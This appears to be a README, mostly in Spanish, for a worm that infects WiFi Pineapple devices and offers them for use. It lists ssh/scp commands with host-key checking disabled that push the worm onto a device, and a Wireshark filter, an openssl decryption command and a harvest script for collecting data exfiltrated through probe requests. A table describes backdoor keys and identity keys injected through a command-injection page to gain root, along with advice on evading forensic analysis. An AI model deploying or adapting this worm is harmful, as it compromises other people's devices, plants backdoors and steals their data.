
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Nota: Necesitará tener un dispositivo configurado O usar el módulo de metasploit para habilitar ssh
El filtro de wireshark es:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
Opcionalmente, use el script harvest.py de la siguiente manera:
python harvest.py [monitor-iface]
| Archivo | Propósito |
|---|---|
| tv | El virus en sí. |
| tvbd | La clave backdoor "maestra", no distribuya la clave privada. |
| tvd | La clave de divulgación, utilizada para exfiltrar datos mediante probe requests. |
| tospo_rsa | La clave privada de identidad, específica de cada dispositivo infectado, utilizada como clave de transferencia. |
| tospo_rsa.pub | La clave pública de identidad, transferida a través de la página de inyección de comandos para permitir que la identidad privada realice acciones como root en el dispositivo remoto. |
| w | Opciones de configuración inalámbrica enviadas, utilizadas para restaurar conexiones anteriores. |
| n | Opciones de configuración de red enviadas, utilizadas para restaurar conexiones anteriores. |
| Nota: Todos los archivos que comienzan con 'tv' se transfieren al infectar un nuevo dispositivo. No agregue claves privadas ni similares con nombres que comiencen con 'tv'; de lo contrario, su clave privada quedará expuesta al análisis forense. |